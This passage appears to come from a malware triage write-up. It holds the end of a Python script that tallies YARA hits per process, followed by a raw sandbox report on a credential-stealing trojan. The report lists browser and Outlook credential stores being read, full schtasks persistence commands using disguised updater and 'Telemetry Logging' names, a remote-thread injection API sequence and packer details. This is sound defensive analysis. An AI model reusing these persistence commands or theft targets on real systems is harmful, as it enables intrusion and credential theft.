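    return {"images": images, "rules": rules, "unresolved": unresolved}


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    for name, e in s["rules"].items():
        hit = ", ".join(f"{p} ({s['images'].get(p, 'image unknown')})" for p in e["procs"])
        print(f"{name} [{e['id']}] -> {hit}")
    print("unnamed processes:", s["unresolved"])
```

Running it on the seven sample lines shows both rules hitting process 7 (the dropped dD08ulq4N33OmW5HQdwT.exe) and process 28 (AdobeUpdaterV2.exe), and one memory-only hit in process 14 that has no .unpack line in the sample; over the full list the same pass tells you which of the dropped copies were actually identified as the clipper rather than counting 33 separate detections.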
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@36/36@3/5
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\trixy_lgbWpHb9dJ2 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069275480.00000000064E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059248318.00000000064CF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073144947.00000000064CF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, HXF2GKJggz_xLogin Data.0.dr, ogxbFEXNUkQ0Login Data.0.dr, mX4bSXvGCffaLogin Data For Account.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 28%
Source: file.exe Virustotal: Detection: 22%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll Jump to behavior
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 3679520 > 1048576
Source: file.exe Static PE information: Raw size of .vmp,,,2 is bigger than: 0x100000 < 0x37e000

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe Unpacked PE file: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe Unpacked PE file: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 22.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 24.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 25.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 28.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 29.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread, 0_2_0098C630
Source: initial sample Static PE information: section where entry point is pointing to: .vmp,,,2
Source: file.exe Static PE information: section name: .vmp,,,0
Source: file.exe Static PE information: section name: .vmp,,,1
Source: file.exe Static PE information: section name: .vmp,,,2
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: dD08ulq4N33OmW5HQdwT.exe.0.dr Static PE information: section name: .MPRESS1
Source: dD08ulq4N33OmW5HQdwT.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: JcZ7W4aCxlpc4pOVLwL1.exe.0.dr Static PE information: section name: .MPRESS1
Source: JcZ7W4aCxlpc4pOVLwL1.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
